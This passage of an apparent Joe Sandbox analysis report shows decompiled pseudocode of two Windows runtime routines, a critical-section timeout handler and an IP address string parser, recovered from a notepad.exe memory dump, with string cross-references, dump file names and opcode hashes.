                                                  									return 0;
                                                  								} else {
                                                  									__eflags = _v24;
                                                  									if(_v24 != 0) {
                                                  										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                  									}
                                                  									return 2;
                                                  								}
                                                  								goto L36;
                                                  							}
                                                  							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                  							_push(_t67);
                                                  							_t46 = E00AE4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                  							_push(_t77);
                                                  							E00AF3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                  							_t48 =  *_t85;
                                                  							_t92 = _t91 + 0x18;
                                                  							__eflags = _t48 - 0xffffffff;
                                                  							if(_t48 == 0xffffffff) {
                                                  								_t49 = 0;
                                                  								__eflags = 0;
                                                  							} else {
                                                  								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                  							}
                                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                  							_push(_t49);
                                                  							_t50 = _v12;
                                                  							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                  							_push(_t85);
                                                  							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                  							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                  							E00AF3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                  							_t53 =  *_t85;
                                                  							_t93 = _t92 + 0x20;
                                                  							_t67 = _t67 + 1;
                                                  							__eflags = _t53 - 0xffffffff;
                                                  							if(_t53 != 0xffffffff) {
                                                  								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                  								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                  							}
                                                  							__eflags = _t67 - 2;
                                                  							if(_t67 > 2) {
                                                  								__eflags = _t85 - 0xb820c0;
                                                  								if(_t85 != 0xb820c0) {
                                                  									_t76 = _a4;
                                                  									__eflags = _a4 - _a8;
                                                  									if(__eflags == 0) {
                                                  										E00B2217A(_t71, __eflags, _t85);
                                                  									}
                                                  								}
                                                  							}
                                                  							_push("RTL: Re-Waiting\n");
                                                  							_push(0);
                                                  							_push(0x65);
                                                  							_a8 = _a4;
                                                  							E00AF3F92();
                                                  							_t91 = _t93 + 0xc;
                                                  							__eflags =  *0x7ffe0382;
                                                  							if( *0x7ffe0382 != 0) {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						goto L36;
                                                  					}
                                                  				} else {
                                                  					return _t40;
                                                  				}
                                                  				L36:
                                                  			}

                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 00B024FA
                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B0248D
                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B024BD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                  • API String ID: 0-3177188983
                                                  • Opcode ID: 869e2670ae23bcd1a7d615dbeff2838da892ee0789c0ebb76ac980487df036f6
                                                  • Instruction ID: c7188bcc32e34fda3d29d7867a49a803e8ac7a8982b6e13b8bda293b5bb7a04b
                                                  • Opcode Fuzzy Hash: 869e2670ae23bcd1a7d615dbeff2838da892ee0789c0ebb76ac980487df036f6
                                                  • Instruction Fuzzy Hash: 0341C271A04204AFDB20DB68CD89F6A7BF8EF85720F208649F655DB2D1D774E94187A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00ADFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _t98;  /* declaration missing in the decompiler output; used at the memmove call below */
                                                  				signed int _t105;
                                                  				void* _t110;
                                                  				char _t114;
                                                  				short _t115;
                                                  				void* _t118;
                                                  				signed short* _t119;
                                                  				short _t120;
                                                  				char _t122;
                                                  				void* _t127;
                                                  				void* _t130;
                                                  				signed int _t136;
                                                  				intOrPtr _t143;
                                                  				signed int _t158;
                                                  				signed short* _t164;
                                                  				signed int _t167;
                                                  				void* _t170;
                                                  
                                                  				_t158 = 0;
                                                  				_t164 = _a4;
                                                  				_v20 = 0;
                                                  				_v24 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_v16 = 0;
                                                  				_v28 = 0;
                                                  				_t136 = 0;
                                                  				while(1) {
                                                  					_t167 =  *_t164 & 0x0000ffff;
                                                  					if(_t167 == _t158) {
                                                  						break;
                                                  					}
                                                  					_t118 = _v20 - _t158;
                                                  					if(_t118 == 0) {
                                                  						if(_t167 == 0x3a) {
                                                  							if(_v12 > _t158 || _v8 > _t158) {
                                                  								break;
                                                  							} else {
                                                  								_t119 =  &(_t164[1]);
                                                  								if( *_t119 != _t167) {
                                                  									break;
                                                  								}
                                                  								_t143 = 2;
                                                  								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                  								_v28 = 1;
                                                  								_v8 = _t143;
                                                  								_t136 = _t136 + 1;
                                                  								L47:
                                                  								_t164 = _t119;
                                                  								_v20 = _t143;
                                                  								L14:
                                                  								if(_v24 == _t158) {
                                                  									L19:
                                                  									_t164 =  &(_t164[1]);
                                                  									_t158 = 0;
                                                  									continue;
                                                  								}
                                                  								if(_v12 == _t158) {
                                                  									if(_v16 > 4) {
                                                  										L29:
                                                  										return 0xc000000d;
                                                  									}
                                                  									_t120 = E00ADEE02(_v24, _t158, 0x10);
                                                  									_t170 = _t170 + 0xc;
                                                  									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                  									_t136 = _t136 + 1;
                                                  									goto L19;
                                                  								}
                                                  								if(_v16 > 3) {
                                                  									goto L29;
                                                  								}
                                                  								_t122 = E00ADEE02(_v24, _t158, 0xa);
                                                  								_t170 = _t170 + 0xc;
                                                  								if(_t122 > 0xff) {
                                                  									goto L29;
                                                  								}
                                                  								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                  								goto L19;
                                                  							}
                                                  						}
                                                  						L21:
                                                  						if(_v8 > 7 || _t167 >= 0x80) {
                                                  							break;
                                                  						} else {
                                                  							if(E00AD685D(_t167, 4) == 0) {
                                                  								if(E00AD685D(_t167, 0x80) != 0) {
                                                  									if(_v12 > 0) {
                                                  										break;
                                                  									}
                                                  									_t127 = 1;
                                                  									_a7 = 1;
                                                  									_v24 = _t164;
                                                  									_v20 = 1;
                                                  									_v16 = 1;
                                                  									L36:
                                                  									if(_v20 == _t127) {
                                                  										goto L19;
                                                  									}
                                                  									_t158 = 0;
                                                  									goto L14;
                                                  								}
                                                  								break;
                                                  							}
                                                  							_a7 = 0;
                                                  							_v24 = _t164;
                                                  							_v20 = 1;
                                                  							_v16 = 1;
                                                  							goto L19;
                                                  						}
                                                  					}
                                                  					_t130 = _t118 - 1;
                                                  					if(_t130 != 0) {
                                                  						if(_t130 == 1) {
                                                  							goto L21;
                                                  						}
                                                  						_t127 = 1;
                                                  						goto L36;
                                                  					}
                                                  					if(_t167 >= 0x80) {
                                                  						L7:
                                                  						if(_t167 == 0x3a) {
                                                  							_t158 = 0;
                                                  							if(_v12 > 0 || _v8 > 6) {
                                                  								break;
                                                  							} else {
                                                  								_t119 =  &(_t164[1]);
                                                  								if( *_t119 != _t167) {
                                                  									_v8 = _v8 + 1;
                                                  									L13:
                                                  									_v20 = _t158;
                                                  									goto L14;
                                                  								}
                                                  								if(_v28 != 0) {
                                                  									break;
                                                  								}
                                                  								_v28 = _v8 + 1;
                                                  								_t143 = 2;
                                                  								_v8 = _v8 + _t143;
                                                  								goto L47;
                                                  							}
                                                  						}
                                                  						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                  							break;
                                                  						} else {
                                                  							_v12 = _v12 + 1;
                                                  							_t158 = 0;
                                                  							goto L13;
                                                  						}
                                                  					}
                                                  					if(E00AD685D(_t167, 4) != 0) {
                                                  						_v16 = _v16 + 1;
                                                  						goto L19;
                                                  					}
                                                  					if(E00AD685D(_t167, 0x80) != 0) {
                                                  						_v16 = _v16 + 1;
                                                  						if(_v12 > 0) {
                                                  							break;
                                                  						}
                                                  						_a7 = 1;
                                                  						goto L19;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				 *_a8 = _t164;
                                                  				if(_v12 != 0) {
                                                  					if(_v12 != 3) {
                                                  						goto L29;
                                                  					}
                                                  					_v8 = _v8 + 1;
                                                  				}
                                                  				if(_v28 != 0 || _v8 == 7) {
                                                  					if(_v20 != 1) {
                                                  						if(_v20 != 2) {
                                                  							goto L29;
                                                  						}
                                                  						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                  						L65:
                                                  						_t105 = _v28;
                                                  						if(_t105 != 0) {
                                                  							_t98 = (_t105 - _v8) * 2; // 0x11
                                                  							E00AB8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                  							_t110 = 8;
                                                  							E00AADFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                  						}
                                                  						return 0;
                                                  					}
                                                  					if(_v12 != 0) {
                                                  						if(_v16 > 3) {
                                                  							goto L29;
                                                  						}
                                                  						_t114 = E00ADEE02(_v24, 0, 0xa);
                                                  						_t170 = _t170 + 0xc;
                                                  						if(_t114 > 0xff) {
                                                  							goto L29;
                                                  						}
                                                  						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                  						goto L65;
                                                  					}
                                                  					if(_v16 > 4) {
                                                  						goto L29;
                                                  					}
                                                  					_t115 = E00ADEE02(_v24, 0, 0x10);
                                                  					_t170 = _t170 + 0xc;
                                                  					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                  					goto L65;
                                                  				} else {
                                                  					goto L29;
                                                  				}
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID:
                                                  • API String ID: 3965848254-0
                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                  • Instruction ID: 46c7b780ba6727e986d7980db23e8327a5adf5d94968f1c0b6a916f89db99a5f
                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                  • Instruction Fuzzy Hash: 56918F31D0024AEFDF24DF98C8456AFBBB5FB55304F24847BD453A62A2EB309A41DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%